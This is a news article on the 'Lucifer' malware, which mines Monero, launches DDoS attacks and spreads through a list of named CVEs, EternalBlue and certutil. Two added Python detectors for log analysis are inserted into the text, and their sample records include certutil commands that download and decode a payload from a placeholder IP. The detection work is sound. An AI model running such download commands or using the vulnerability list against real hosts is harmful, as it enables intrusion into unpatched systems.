"Lucifer" Malware Is Targeting Windows Machines Using NSA Exploits: Protect Yourself Now

Security researchers have discovered a new type of malware that hijacks vulnerable Windows devices to mine cryptocurrency and launch devastating DDoS attacks.

The malware, dubbed "Lucifer" by its discoverers at cybersecurity firm Palo Alto Networks' Unit 42, brute-forces its way into a system by trying common usernames and passwords against widely used services listening on well-known ports.
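A basic detection for the credential brute-forcing described above, as an added example that is not part of the original article or of Unit 42's analysis: it reads a constructed CSV export of Windows Security log failed-logon events (Event ID 4625) and flags any source address that produces five or more network-logon failures inside a one-minute sliding window. The column names, threshold, window and sample rows are assumptions.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a CSV export of Security log events. Columns and values
# are assumptions modelled on Event ID 4625 (logon failure) / 4624 (success).
SAMPLE_LOG = """\
TimeCreated,EventID,TargetUserName,IpAddress,LogonType
2020-06-11T08:00:01,4625,administrator,203.0.113.7,3
2020-06-11T08:00:02,4625,admin,203.0.113.7,3
2020-06-11T08:00:02,4625,user,203.0.113.7,3
2020-06-11T08:00:03,4625,test,203.0.113.7,3
2020-06-11T08:00:04,4625,backup,203.0.113.7,3
2020-06-11T08:00:05,4625,guest,203.0.113.7,3
2020-06-11T08:00:20,4625,jsmith,192.0.2.15,2
2020-06-11T09:15:00,4625,jsmith,192.0.2.15,2
2020-06-11T09:15:30,4624,jsmith,192.0.2.15,2
"""


def parse_events(text):
    """Parse the CSV export into dicts with a typed timestamp and event ID."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["TimeCreated"] = datetime.fromisoformat(row["TimeCreated"])
        row["EventID"] = int(row["EventID"])
        events.append(row)
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Return {source_ip: sorted usernames tried} for every source that
    produced at least `threshold` failed network logons (LogonType 3, which is
    what remote password guessing against SMB or RPC generates) within any
    `window`-long span. Interactive failures (LogonType 2) are ignored."""
    failures = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4625 and ev["LogonType"] == "3":
            failures[ev["IpAddress"]].append(ev)

    alerts = {}
    for ip, evs in failures.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        start = 0
        for end in range(len(evs)):  # sliding window over the sorted failures
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = sorted({e["TargetUserName"] for e in evs})
                break
    return alerts


if __name__ == "__main__":
    for ip, users in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(f"brute-force from {ip}: {len(users)} accounts tried: {', '.join(users)}")
```

The distinct-username list is what tells a password spray (many accounts, few passwords) from a single-account brute force; a user fat-fingering a password twice an hour apart, as 192.0.2.15 does here, never reaches the threshold.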

This malware primarily targets corporate servers, but it can also infect personal computers, especially since a compromised server gives it a foothold from which to spread across the corporate network.

Unit 42 came across this malware while investigating exploitation of CVE-2019-9081, a deserialization vulnerability in the open-source Laravel web application framework.

"Upon closer examination of this malware, which we named 'Lucifer,' we found that it is capable of DDoS attacks and has all kinds of exploits against vulnerable Windows hosts," Unit 42 researchers wrote in a blog post.

(Lucifer's own creator calls this malware "Satan DDoS," but Unit 42 thought that might cause confusion since there is already a "Satan" ransomware).

"The first wave of the campaign stopped on June 10, 2020. The attackers then resumed the campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc," the researchers wrote.

Researchers have described Lucifer as having "quite powerful capabilities." Once a system is infected, the malware mines the Monero cryptocurrency and spreads itself to other machines on the local network using the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor, tools stolen from the US National Security Agency and leaked publicly in 2017.

According to the researchers, Lucifer "weaponizes" a long list of known security vulnerabilities to break into hosts and spread.

These vulnerabilities, identified by their Common Vulnerabilities and Exposures (CVE) IDs, span web frameworks, application servers and Windows itself:

- CVE-2014-6287 (Rejetto HTTP File Server remote code execution)
- CVE-2018-1000861 (Jenkins remote code execution via the Stapler web framework)
- CVE-2017-10271 (Oracle WebLogic Server WLS Security component remote code execution)
- CVE-2018-20062 (ThinkPHP remote code execution)
- CVE-2018-7600 (Drupal core remote code execution, known as "Drupalgeddon 2")
- CVE-2017-9791 (Apache Struts 2 remote code execution)
- CVE-2019-9081 (Laravel Framework deserialization leading to remote code execution)
- PHPStudy backdoor remote code execution
- CVE-2017-0144 and CVE-2017-0145 (Windows SMBv1 remote code execution, the EternalBlue and EternalRomance bugs fixed by MS17-010)
- CVE-2017-8464 (Windows LNK shortcut file remote code execution)

"These vulnerabilities are rated High or Critical because their exploitation is trivial and their impact on victims is enormous," the researchers explained. Once any of them is exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case the targets are Windows hosts on both the internet and internal networks, and the attacker uses the built-in certutil utility in the payload to fetch and propagate the malware.

Certutil.exe is a command-line utility built into Windows for managing certificates and certificate services. Because it is signed by Microsoft and present on every Windows host, attackers also abuse it as a "living off the land" tool to download and decode payloads without dropping a separate downloader, which is the role it plays here.
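The certutil abuse described above is something defenders can hunt for in process-creation telemetry. The following is an added example, not code from the original article or from Unit 42: it classifies constructed records shaped like Sysmon Event ID 1 fields (Image, CommandLine, OriginalFileName), flagging certutil invocations that download or decode files while letting ordinary certificate administration pass. The sample paths, host address and file names are assumptions, not indicators from the Lucifer campaign, and the set of suspicious switches is a judgement call based on certutil's documented options.

```python
import re

# Constructed sample records shaped like Sysmon Event ID 1 (process creation)
# fields; paths, host and file names are assumptions, not Lucifer indicators.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.7/x.dat C:\Users\Public\x.dat"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe /decode C:\Users\Public\x.dat C:\Users\Public\x.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\temp\server.cer"},   # legitimate PKI use
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -store My"},                              # legitimate PKI use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Get-Date"},
    # Renamed copy: only the PE's OriginalFileName gives it away.
    {"Image": r"C:\Users\Public\ct.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"ct.exe -urlcache -f http://203.0.113.7/y.dat y.dat"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def is_certutil(record):
    """certutil may be run with or without '.exe', with - or / switches, or as a
    renamed copy; the OriginalFileName field survives renaming."""
    image = record.get("Image", "").lower()
    orig = record.get("OriginalFileName", "").lower()
    first = record.get("CommandLine", "").split(" ", 1)[0].strip('"').lower()
    return (image.endswith("\\certutil.exe") or orig == "certutil.exe"
            or first in ("certutil", "certutil.exe"))


def classify_certutil(record):
    """Return the reasons a record looks like certutil being used to fetch or
    unpack a payload; an empty list means not certutil, or normal cert admin."""
    if not is_certutil(record):
        return []
    cmd = record.get("CommandLine", "")
    switches = {t.lstrip("-/").lower() for t in cmd.split()[1:] if t and t[0] in "-/"}
    reasons = []
    if "urlcache" in switches:
        reasons.append("-urlcache downloads a remote file to disk")
    if switches & {"decode", "decodehex"}:
        reasons.append("-decode turns a dropped text blob back into a binary")
    if switches & {"encode", "encodehex"}:
        reasons.append("-encode base64-encodes a file (staging/obfuscation)")
    if URL_RE.search(cmd) and "urlcache" not in switches:
        reasons.append("URL on the command line outside -urlcache (e.g. -verifyctl)")
    return reasons


def scan(records):
    """Return [(index, reasons)] for every flagged record, preserving order."""
    hits = []
    for i, rec in enumerate(records):
        reasons = classify_certutil(rec)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_PROCESSES):
        print(f"[{i}] {SAMPLE_PROCESSES[i]['CommandLine']}")
        for r in reasons:
            print(f"      {r}")
```

To run this against real data, export Sysmon Event ID 1 records with the same field names. Expect legitimate PKI administration (-store, -verify, -pulse) to pass, and trim or extend the switch list to match what your environment actually uses; the renamed-copy case is why matching on the image path alone is not enough.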

While these vulnerabilities are certainly worrisome, the researchers noted that patches are "readily available" and urged organizations to keep their systems updated to blunt the attack. Neither the vulnerabilities this malware exploits nor its methods are novel, but they are a reminder that it is critical to keep systems as up to date as possible, eliminate weak credentials, and maintain layered defenses as a backstop.

Whether it is a laptop or a web server, to keep your Windows system from being hit by the Lucifer malware, make sure it is fully patched with the latest Windows security updates and that every administrator account has a strong, unique password.

Reputable antivirus software also helps; most major products already detect and block Lucifer and its components.
